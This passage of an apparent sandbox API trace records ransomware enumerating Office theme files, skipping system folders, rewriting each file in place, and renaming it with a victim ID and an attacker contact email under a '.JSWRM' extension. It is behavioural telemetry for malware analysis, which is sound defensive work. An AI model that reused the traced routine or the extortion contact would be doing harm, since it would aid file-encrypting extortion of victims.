(lpString1="TrebuchetMs.xml", lpString2="msocache") returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TrebuchetMs.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TrebuchetMs.xml", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrebuchetMs.xml", lpUsedDefaultChar=0x0) returned 15 [0101.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TrebuchetMs.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TrebuchetMs.xml", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrebuchetMs.xml", lpUsedDefaultChar=0x0) returned 15 [0101.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0101.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0101.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\TrebuchetMs.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\trebuchetms.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.191] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3543) returned 1 [0101.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x206858 [0101.191] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0101.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.193] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0101.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.194] CloseHandle (hObject=0x314) returned 1 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0101.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0101.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\TrebuchetMs.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\trebuchetms.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\TrebuchetMs.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\trebuchetms.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0101.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0101.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0101.195] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1151b8e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1151b8e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe9e, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Tw Cen MT-Rockwell.xml", cAlternateFileName="TWCENM~2.XML")) returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2=".") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="..") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="...") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="windows") returned -1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="recovery") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="perflogs") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="documents and settings") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="system volume information") returned 1 [0101.195] lstrcmpiW (lpString1="Tw Cen MT-Rockwell.xml", lpString2="msocache") returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT-Rockwell.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT-Rockwell.xml", cchWideChar=22, lpMultiByteStr=0x2412e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tw Cen MT-Rockwell.xml", lpUsedDefaultChar=0x0) returned 22 [0101.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT-Rockwell.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT-Rockwell.xml", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tw Cen MT-Rockwell.xml", lpUsedDefaultChar=0x0) returned 22 [0101.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0101.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT-Rockwell.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt-rockwell.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3742) returned 1 [0101.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe90) returned 0x206858 [0101.196] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xe90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xe90, lpOverlapped=0x0) returned 1 [0101.198] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.198] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xe90, lpOverlapped=0x0) returned 1 [0101.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.199] CloseHandle (hObject=0x314) returned 1 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0101.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0101.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0101.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0101.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.199] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT-Rockwell.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt-rockwell.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT-Rockwell.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt-rockwell.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.200] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Tw Cen MT.xml", cAlternateFileName="TWCENM~1.XML")) returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2=".") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="..") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="...") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="windows") returned -1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="recovery") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="perflogs") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="documents and settings") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="system volume information") returned 1 [0101.200] lstrcmpiW (lpString1="Tw Cen MT.xml", lpString2="msocache") returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT.xml", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tw Cen MT.xml", lpUsedDefaultChar=0x0) returned 13 [0101.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tw Cen MT.xml", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tw Cen MT.xml", lpUsedDefaultChar=0x0) returned 13 [0101.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0101.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.201] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3744) returned 1 [0101.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x206858 [0101.201] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0101.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.203] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0101.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.203] CloseHandle (hObject=0x314) returned 1 [0101.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0101.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0101.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0101.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.205] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Tw Cen MT.xml", cAlternateFileName="TWCENM~1.XML")) returned 0 [0101.205] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0101.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0101.205] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2=".") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="..") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="...") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="windows") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="recovery") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="perflogs") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="documents and settings") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="$RECYCLE.BIN") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="system volume information") returned 1 [0101.205] lstrcmpiW (lpString1="Wisp.thmx", lpString2="msocache") returned 1 [0101.205] RtlAllocateHeap (HeapHandle=0x1e0000, 